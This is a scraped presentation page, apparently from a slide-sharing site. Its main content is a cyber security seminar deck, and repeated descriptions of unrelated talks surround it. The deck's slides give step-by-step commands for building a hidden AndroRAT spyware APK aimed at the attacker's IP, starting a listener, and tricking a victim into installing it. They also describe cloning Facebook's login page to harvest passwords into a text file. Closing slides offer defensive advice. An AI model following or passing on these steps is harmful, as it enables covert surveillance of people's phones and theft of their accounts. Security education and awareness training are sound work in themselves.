This document contains a presentation on cyber security, ethical hacking, and penetration testing. It discusses various cyber threats like hacking, malware, and phishing. It then provides details on mobile hacking using AndroRAT to remotely control an Android phone. It also covers social media hacking techniques and how to conduct phishing attacks on sites like Facebook. The document concludes with a section on ransomware that demonstrates encrypting and decrypting files with a Python script.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
This tutorial is related to Hacking.Key terms: Introduction to Hacking,
History of Hacking,
The Hacker attitude,
Basic Hacking skills,
Hacking Premeasured,
IP Address,
Finding IP Address,
IP Address dangers & Concerns,
Hacking Tutorial
Network Hacking,
General Hacking Methodology,
Port Scanning,
ICMP Scanning,
Security Threats,
Counter-attack strategies,
Host-detection techniques,
Host-detection ping,
Denial of Service attacks, DOS Attacks,
Threat from Sniffing and Key Logging,
Trojan Attacks,
IP Spoofing,
Buffer Overflows,
All other types of Attacks, SMURF attacks, Sniffers, Keylogger, trojans,
Hacking NETBIOS,
Internet application security,
Internet application hacking statistics, Web application hacking reasons,
General Hacking Methods,
Vulnerability,
Hacking techniques,
XPath Injection
For more details visit Tech-Blog: https://msatechnosoft.in/blog/tech-blogs/
Being aware of online and malware threats is the first step to computer security. In this presentation, we help you understand:
a. Importance of computer security
b. Consequences of ignoring computer security
c. Types of threats that can harm your computer
d. Measures to take to keep your computer safe
e. How can Quick Heal help
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
This tutorial is related to Hacking.Key terms: Introduction to Hacking,
History of Hacking,
The Hacker attitude,
Basic Hacking skills,
Hacking Premeasured,
IP Address,
Finding IP Address,
IP Address dangers & Concerns,
Hacking Tutorial
Network Hacking,
General Hacking Methodology,
Port Scanning,
ICMP Scanning,
Security Threats,
Counter-attack strategies,
Host-detection techniques,
Host-detection ping,
Denial of Service attacks, DOS Attacks,
Threat from Sniffing and Key Logging,
Trojan Attacks,
IP Spoofing,
Buffer Overflows,
All other types of Attacks, SMURF attacks, Sniffers, Keylogger, trojans,
Hacking NETBIOS,
Internet application security,
Internet application hacking statistics, Web application hacking reasons,
General Hacking Methods,
Vulnerability,
Hacking techniques,
XPath Injection
For more details visit Tech-Blog: https://msatechnosoft.in/blog/tech-blogs/
Being aware of online and malware threats is the first step to computer security. In this presentation, we help you understand:
a. Importance of computer security
b. Consequences of ignoring computer security
c. Types of threats that can harm your computer
d. Measures to take to keep your computer safe
e. How can Quick Heal help
Computer security introduction lecture. Introduction
Network Security
Basic Components Of Computer Security
Online Security Vs Online Safety
Risks & Threats
Steps to protect information
Steps to protect computer
Ethical Impact
Case study
Statistics about Internet Crime
survey
conclusion
A Webinar on cyber Security Awareness and Digital Safety is hosted on the 7th of June, 2020. Sthir Yuwa in association with Information Security Response Team Nepal and Center For Cyber Security Research and Innovation conducted successfully. There were almost 70 participants on this webinar.
This presentation is in English; the announcement (beneath) & talk were in Dutch (NL)
OpenTechTalks | Ethisch hacken met Kali
Overheden, bedrijven en particulieren worden steeds kwetsbaarder voor aanvallen van black hat hackers, criminelen die de lekken in computers uitbuiten voor geldgewin of louter om schade te veroorzaken. Daartegenover staan de white hat hackers: zij testen computersystemen op fouten en dichten de lekken voordat malafide hackers inbreken. Tijl Deneut (UGent/Howest) geeft een overzicht van welke vormen van cybercriminalteit er bestaan en hoe je je ertegen kunt wapenen. De focus ligt op Kali Linux, een besturingssysteem dat honderden beveiligings- en testprogramma's bundelt. Volgende vragen komen aan bod: hoe installeer je Kali Linux? Hoe kun je in een veilige omgeving testen? Is ethisch hacken eigenlijk wel legaal? Algemene IT-kennis is aangewezen. Achteraf drinken we een glas in het café van Vooruit.
Workshop on Cyber security and investigationMehedi Hasan
Introduction:
In the fast-evolving digital age of the 21st century, cybersecurity has emerged as a paramount concern for governments, businesses, and individuals. The Workshop on Cybersecurity is a comprehensive and immersive event designed to address the challenges posed by cyber threats and equip participants with the knowledge and tools to safeguard their digital assets. This workshop, to be held over five days, seeks to empower attendees with the latest insights and practices in cyber defense, fostering a culture of resilience and proactive security measures.
Day 1: Understanding the Cyber Landscape
The workshop commences with a deep dive into the complex cyber landscape that defines modern society. Distinguished experts from the cybersecurity field will present an overview of the ever-changing cyber ecosystem, highlighting its interconnectedness and vulnerabilities. Participants will gain valuable insights into the roles of governments, corporations, and individuals in shaping the cyber landscape.
Key topics covered will include the global impact of cyberattacks, the importance of international collaboration in countering cyber threats, and the significance of public-private partnerships. This foundational knowledge will serve as the basis for the subsequent discussions on cyber defense strategies.
Day 2: Unraveling Cyber Threats and Attack Vectors
Day two focuses on understanding the multitude of cyber threats and attack vectors that can target individuals and organizations. Renowned cybersecurity researchers will present real-life case studies of recent cyber incidents, ranging from nation-state-sponsored attacks to financially motivated hacking campaigns. Participants will gain a comprehensive understanding of the tactics employed by threat actors and the motivations behind their actions.
Through interactive sessions, attendees will be immersed in simulated cyber-attack scenarios, enabling them to identify and mitigate potential threats effectively. The day will emphasize the need for a proactive and adaptive approach to cybersecurity, as well as the importance of threat intelligence sharing to bolster collective defense capabilities.
Day 3: Building Robust Cyber Defense Strategies
Day three delves into the development and implementation of robust cyber defense strategies. Experts in the field will introduce participants to cutting-edge tools and technologies that can effectively detect, prevent, and respond to cyber threats. Topics covered will include advanced threat hunting techniques, next-generation firewalls, intrusion detection systems, and incident response best practices.
Wfh security risks - Ed Adams, President, Security InnovationPriyanka Aash
Our security practices need to evolve in order to address the new challenges propped up by the rapid adoption of technologies and products to enable the world to WFH. The mantra of the attacker remains consistent -- attack that which yields maximum result -- and that is usually something used by a very very large number of users. This webinar will discuss the Top 10 Security Gaps that CISOs should be aware of as they brace for long WFH periods.
What will you learn :
-New Attack techniques hackers are using targeting WFH
-How to handle decentralisation of IT and technology decisions?
-Application risks as enterprises pivot to online/new business model(s)
-New risks in the Cloud and due to Shadow IT
-Security risks due to uninformed employees & their home infrastructure
-How to handle Misconfigurations & Third party risks
-How to build a robust breach response and recovery program?
Full video - https://youtu.be/bQLfnmhDnQs
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
More Related Content
Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx
Computer security introduction lecture. Introduction
Network Security
Basic Components Of Computer Security
Online Security Vs Online Safety
Risks & Threats
Steps to protect information
Steps to protect computer
Ethical Impact
Case study
Statistics about Internet Crime
survey
conclusion
A Webinar on cyber Security Awareness and Digital Safety is hosted on the 7th of June, 2020. Sthir Yuwa in association with Information Security Response Team Nepal and Center For Cyber Security Research and Innovation conducted successfully. There were almost 70 participants on this webinar.
This presentation is in English; the announcement (beneath) & talk were in Dutch (NL)
OpenTechTalks | Ethisch hacken met Kali
Overheden, bedrijven en particulieren worden steeds kwetsbaarder voor aanvallen van black hat hackers, criminelen die de lekken in computers uitbuiten voor geldgewin of louter om schade te veroorzaken. Daartegenover staan de white hat hackers: zij testen computersystemen op fouten en dichten de lekken voordat malafide hackers inbreken. Tijl Deneut (UGent/Howest) geeft een overzicht van welke vormen van cybercriminalteit er bestaan en hoe je je ertegen kunt wapenen. De focus ligt op Kali Linux, een besturingssysteem dat honderden beveiligings- en testprogramma's bundelt. Volgende vragen komen aan bod: hoe installeer je Kali Linux? Hoe kun je in een veilige omgeving testen? Is ethisch hacken eigenlijk wel legaal? Algemene IT-kennis is aangewezen. Achteraf drinken we een glas in het café van Vooruit.
Workshop on Cyber security and investigationMehedi Hasan
Introduction:
In the fast-evolving digital age of the 21st century, cybersecurity has emerged as a paramount concern for governments, businesses, and individuals. The Workshop on Cybersecurity is a comprehensive and immersive event designed to address the challenges posed by cyber threats and equip participants with the knowledge and tools to safeguard their digital assets. This workshop, to be held over five days, seeks to empower attendees with the latest insights and practices in cyber defense, fostering a culture of resilience and proactive security measures.
Day 1: Understanding the Cyber Landscape
The workshop commences with a deep dive into the complex cyber landscape that defines modern society. Distinguished experts from the cybersecurity field will present an overview of the ever-changing cyber ecosystem, highlighting its interconnectedness and vulnerabilities. Participants will gain valuable insights into the roles of governments, corporations, and individuals in shaping the cyber landscape.
Key topics covered will include the global impact of cyberattacks, the importance of international collaboration in countering cyber threats, and the significance of public-private partnerships. This foundational knowledge will serve as the basis for the subsequent discussions on cyber defense strategies.
Day 2: Unraveling Cyber Threats and Attack Vectors
Day two focuses on understanding the multitude of cyber threats and attack vectors that can target individuals and organizations. Renowned cybersecurity researchers will present real-life case studies of recent cyber incidents, ranging from nation-state-sponsored attacks to financially motivated hacking campaigns. Participants will gain a comprehensive understanding of the tactics employed by threat actors and the motivations behind their actions.
Through interactive sessions, attendees will be immersed in simulated cyber-attack scenarios, enabling them to identify and mitigate potential threats effectively. The day will emphasize the need for a proactive and adaptive approach to cybersecurity, as well as the importance of threat intelligence sharing to bolster collective defense capabilities.
Day 3: Building Robust Cyber Defense Strategies
Day three delves into the development and implementation of robust cyber defense strategies. Experts in the field will introduce participants to cutting-edge tools and technologies that can effectively detect, prevent, and respond to cyber threats. Topics covered will include advanced threat hunting techniques, next-generation firewalls, intrusion detection systems, and incident response best practices.
Wfh security risks - Ed Adams, President, Security InnovationPriyanka Aash
Our security practices need to evolve in order to address the new challenges propped up by the rapid adoption of technologies and products to enable the world to WFH. The mantra of the attacker remains consistent -- attack that which yields maximum result -- and that is usually something used by a very very large number of users. This webinar will discuss the Top 10 Security Gaps that CISOs should be aware of as they brace for long WFH periods.
What will you learn :
-New Attack techniques hackers are using targeting WFH
-How to handle decentralisation of IT and technology decisions?
-Application risks as enterprises pivot to online/new business model(s)
-New risks in the Cloud and due to Shadow IT
-Security risks due to uninformed employees & their home infrastructure
-How to handle Misconfigurations & Third party risks
-How to build a robust breach response and recovery program?
Full video - https://youtu.be/bQLfnmhDnQs
Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx (20)
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
3. What is Cyber Security / Ethical hacking /
penetration testing?
Cyber Security:
• It is related to characteristic of digital devices like computer, information technology,
virtual reality, image processing, AI based automation solutions.
• Security is the combination of Confidentiality, Integrity, Availability (CIA) triangle.
Ethical Hacking
• A set of high professional morals & principles.
• Attempt to gain unauthorized access to a computer system, application or data.
Penetration Testing
• It is security exercise where a cyber-security expert attempts to find and exploit
vulnerabilities in a digital equipment.
• Like social media hacking, mobile hacking, Ransomware and others attacks.
5. Why and Who is doing hacking?
• Financial (theft, fraud, blackmail)
• Political /state (state level/ military)
• Fame/ kudos (fun/ status)
• Hacktivism (cause)
• Pen testers (legal hacking)
• Police/ FIA cyber crime division
• Insider
• Business
6. Mobile Hacking (Note : Only For Educational Purpose.)
• Pre-requiste for Mobile Hacking:
• Github installed
• Python3 installed
• Java installed
• Local Machine (PC) IP address
• Linux/Osx System
7. Mobile Hacking (Note : Only For Educational Purpose.)
• Attack using AndroRAT:
• A Tool used to control Android phone remotely
• Client/Server application
• Client-Side developed in Java language
• Server is developed in Python
• Windows/Linux/Osx System
8. Mobile Hacking (Note : Only For Educational Purpose.)
• Step 1: Clone the repository from GitHub:
• A following command should be used to clone the
Git repository.
Git clone https://github.com/karma9874/AndroRAT.git
• Step 2: open the cloned repository in cmd/terminal
cd <Directory_name> AndroRAT
• Step 3: Installing necessary Libraries using PIP tool
pip install –r requirements.txt
9. Mobile Hacking (Note : Only For Educational Purpose.)
• Step 4: Building Malicious apk file for spying Cell phone:
• A following command should be used to build the apk file.
python3 androRAT.py - -build –i <your_IP_Address> -p 8089 –o
<apk_name>.apk
Find IP Address: Use ipconfig /all or ifconfig on cmd/terminal.
• Step 5: Host the Listener as follows:
python3 androRAT.py –shell –I 0.0.0.0 –p 8089
• Step 6: Open another terminal/cmd and run WebServer
sudo apachectl start
10. Mobile Hacking (Note : Only For Educational Purpose.)
• Send generated Android .apk file to Victim cell via
email link, WhatsApp, SMS link etc. The victim will
download it and install it as follows:
11. Mobile Hacking (Note : Only For Educational Purpose.)
• Send generated Android .apk file to Victim cell via appending/email link,
WhatsApp, SMS link etc. The victim will download it and install it as
follows:
12. Mobile Hacking (Note : Only For Educational Purpose.)
• On Hacker side the following shell will appear and wait for listening
connection:
13. Mobile Hacking (Note : Only For Educational Purpose.)
• When victim install apk on their cell the following screenshot shows
that a connection established (IP address appears):
14. Mobile Hacking (Note : Only For Educational Purpose.)
• When victim install apk on their cell the following screenshot shows that a
connection established (IP address appears): write help will show the command
to use victim cell data. The installed apk hide it, no icons can seen on the screen
15. Mobile Hacking (Note : Only For Educational Purpose.)
• The output of deviceInfo shows the device information as follows:
16. Mobile Hacking (Note : Only For Educational Purpose.)
• The output of deviceInfo and camList shows the information as follows:
17. Mobile Hacking (Note : Only For Educational Purpose.)
• The output of deviceInfo and camList shows the information as follows:
18. Mobile Hacking (Note : Only For Educational Purpose.)
• The output of deviceInfo camList, takepic and vibrate shows as follows:
19. Mobile Hacking (Note : Only For Educational Purpose.)
• The output of deviceInfo, camList, ip shows Output as follows:
20. Mobile Hacking (Note : Only For Educational Purpose.)
• The output of SIM information as follows:
21. Social Media Hack (Facebook, Twitter, Instagram etc.)
• Background: Client/Server Architecture
Clients Server
1. Client side Threats
2. Server side Threats
3. Network Threats
22. Social Media Hack (Facebook, Twitter, Instagram etc.)
Email Spoofing & Phishing Attack
• Uses a fake email address or simulates a genuine one in
order to deceive user
• Redirect user to webpage that looks like a social media page
• Records the login information inputted, may attempt to
download malware or perform XSS
• According to Kapersky 1 in 5 Phishing Scams include
Facebook
Hacking FB Accounts Using Tabnapping.
23. Social Media Hack (Facebook, Twitter, Instagram etc.)
• Domain Name System (DNS): In Simple World
• DNS map the Host Name with IP address, There are 13-root name servers in the
world. DNS are placed on different regions world-wide. Host name ping as follows:
24. Social Media Hack (Facebook, Twitter, Instagram etc.)
• In Windows, the file will be located under C:WindowsSystem32driversetc.
25. Social Media Hack (Facebook, Twitter, Instagram etc.)
• WireShark tool is used to capture packets. let's see the traffic on the packet level:
We have an IP address of 192.168.10.19, which is the IP
address of our attacker
26. Social Media Hack (Facebook, Twitter, Instagram etc.)
• Facebook password phishing Step by Step
Step 1: First, we need to set up a phishing page.
first open your browser and navigate to the Facebook
login page. Then, on the browser menu, click on File
and then on Save page as.... Then, make sure that you
choose a complete page from the drop-down menu.
The output should be an .html file. Rename the
Facebook HTML page index.html.
Step 2: Inside this HTML, we have to change the login form. If
you search for action=, you will see it. Here, we change the
login form to redirect the request into a custom PHP page
called login.php. Also, we have to change the request method
to GET instead of POST.
27. Social Media Hack (Facebook, Twitter, Instagram etc.)
• Facebook password phishing Step by Step
Step 3: Next, we will create the passwords.txt file, where the
target credentials will be stored.
Step 4: Now, we will copy all of these files into varwww and
start the Apache services.
If we open the index.html page locally, we will see that this is
the phishing page that the target will see.
Open the browser and navigate to
http://www.facebook.com/:
Now, log into your Facebook account using your username and
password. and jump on the folder and see if we get anything
on the passwords.txt file.
28.
29. Social Media Hack (Facebook, Twitter, Instagram etc.)
• Countermeasures
Securing the online account
30. Social Media Hack (Facebook, Twitter, Instagram etc.)
• Countermeasures
Securing the online account
• Don’t click any links on an email
unless you can guarantee who its
from.
• Use a trusted method of contacting
the company via a phone number,
app or website.
• Mark the email as spam and contact
the organisation.
31. Ransomware Attack Background
• Normally loaded onto a computer via a download/attachment/link
from an email or website.
• Will either lock the screen or encrypt your data.
• Once Ransomware is uploaded on your computer/tablet/phone it is
very difficult to remove without removing all of the data
• Wannacry attack 2017 - One of the biggest cyber attacks to occur.
• Is said to have hit 300,000 computers in 150 countries.
• Companies affected include; K-electric, Life insurance company,
NHS, Renault, FedEx, Spanish telecoms and gas companies,
German railways etc.
An Hacker Encrypt your data and demand ransom in the form of Bitcoins to decrypt back.
32. Ransomware
• More than a third of NHS trusts in England and Wales were affected with over 6,800 operations
cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
33. Ransomware
• More than a third of NHS trusts in England and Wales were affected with over 6,800 operations
cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
36. Ransomware practical demonstration
• In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Output after Encryption, the file inside the folder can’t be readable.
37. Ransomware practical demonstration
• In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Output after decryption operation, the file inside the folder can be readable now.
38. Ransomware practical demonstration
• In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Output after decryption operation, the file inside the folder can be readable again.
39. How to tackle Ransomware
• Back up- Keep a backed up copy of your data. Ensure its not
permanently connected to the network.
• Patch- Keep your software up to date. Wannacry was successful as
those affected computers hadn’t updated. The update contained a fix
for the problem.
• Attachments- Don’t click on links from emails/SMS as this could easily
be from an untrusted source and contain malware like Ransomware
40. Public Wi-Fi
• May not be trustworthy. They could share your information to other
companies who operate in countries without any data protection.
• You may not know who is watching you whilst you’re online.
What to do and not do to
• Don’t use online banking. Use your own data.
• Don’t conduct any purchases
• Use a virtual private network (VPN)
41.
42.
43.
44. CYBER SECURITY Tips
Tips for protecting yourself from cybersecurity threats in 2023:
Password Policy
Use strong passwords and
change them regularly.
Information
Sharing vigilant
Be careful about what
information you share
online.
Firewall and Antivirus
Install a firewall and
antivirus software.
Systems & software
Keep your systems
and software up to
date.
Unknown link and
Attachments
Don't click on links or
open attachments from
unknown senders.
Data Backup
Back up your
data regularly.
Lastly be aware of the latest cybersecurity threats.
45. Passwords Advice
• Use 1 password per account.
• Three random words use. Like Capitals, special characters and
numbers is your own choice.
• If you follow this advice your passwords security will be significantly
increased against a brute force attack.
• Password managers can be helpful to store your passwords.
46. Advice
• In the physical world we’re good at protecting ourselves and
our property, we need to replicate this in the digital world.
• 80% of cyber-crime is preventable.
47. Advice
• Update and migrate
• Activate your firewall
• Staff awareness
• Data encryption
• User accounts privileges i.e admin
• Cyber insurance
• Prepare Plan
48. You are the best defence!
• Technology is only a small part of Cyber Defence
• You are the most important person – protect yourself
• For any businesses the most important and best defence is
Cyber Security Aware employees – train your staff
Always be aware!
Always be on your guard!
THANK YOU